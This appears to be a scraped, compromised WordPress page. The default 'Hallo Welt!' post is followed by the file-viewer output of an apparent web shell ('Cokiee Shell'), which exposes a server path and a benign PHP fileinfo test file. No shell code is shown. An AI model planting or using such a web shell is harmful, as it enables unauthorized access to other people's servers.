Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/fileinfo/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/fileinfo/tests/precedural_finfo_in_method.phpt |
--TEST-- Using procedural finfo API in a method --FILE-- <?php class Test { public function method() { $finfo = finfo_open(FILEINFO_MIME); var_dump(finfo_file($finfo, __FILE__)); } } $test = new Test; $test->method(); ?> --EXPECT-- string(28) "text/x-php; charset=us-ascii"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare